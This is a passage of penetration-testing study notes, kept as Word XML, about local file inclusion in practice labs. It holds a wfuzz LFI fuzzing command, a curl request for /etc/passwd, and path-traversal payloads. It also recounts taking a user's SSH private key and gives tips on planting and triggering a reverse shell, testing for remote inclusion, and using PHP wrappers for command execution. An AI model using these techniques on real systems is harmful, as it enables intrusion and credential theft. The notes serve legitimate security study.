        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More of this can be found in the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Encoding Special Characters (and Apache httpd 2.4.49 exploit)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" section found below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We used it to get SSH key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But id_rsa wasn't there. But instead of quitting, we decided to look for other private key formats and we found </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/anita/.ssh/id_ecdsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C50">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C51">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C52">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI also seen on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia Challenge Lab </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on machine </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.xxx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.246 too</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C53">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C54">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C55">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try looking at the SSH private key, as instructed in the "parameter fuzzing" section of FFUF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C56">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C57">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you get LFI from parameter fuzzing or another method, you can check to see which file paths you can access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C58">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1379"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo wfuzz -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/LFI\ payloads.txt --hw 0 http://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.167.80</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/console/file.php?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=FUZZ</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C59">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C5A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C5B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As shown in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId559">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Ha-natraj</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">log poisoning</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is another big attack vector as a result of LFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C5C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C5D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example for Local File Inclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C5E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C5F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tip: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To get the responses in a nice format, use the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1295"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl 'http://{target_IP}/?file=/etc/passwd' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">will print out the passwords in nice format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C61">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C62">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see something like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://unika.htb/index.php?page=french.html</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where it access the "french.html" from the web server, then you know the "page" parameter uses a path value. So, we can try inputting any path to get files. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="677"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows (the OS of the machine hosting the web server, the target)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="677"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../../../../../../windows/system32/drivers/etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="677"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../../../../../../boot.ini</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the boot.ini file (Windows boot configuration))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="677"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="677"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../../../../../../etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="677"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../../../../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="677"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../../../../../../var/log/syslog</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C6A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C6B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It usually works when there is no proper sanitization in the PHP code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C6C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C6D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mge9ejkfgxtw" w:id="234"/>
      <w:bookmarkEnd w:id="234"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What to do once you have LFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have access to web server already, then put a rev shell in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/shm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and then access it via website LFI to trigger it. We saw this many times in PG Practice and Challenge Labs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check if you have RFI by doing something like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">page=http://192.168.45.232/hello.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where you replace it with your own IP (you don't need hello.txt to exist)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP wrappers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to either view full PHP pages or get command execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId560">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">LFI2RCE via phpinfo()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C72">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId561">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Hacktricks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C73">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">config </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">files specific to the service on the website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C74">
      <w:pPr>
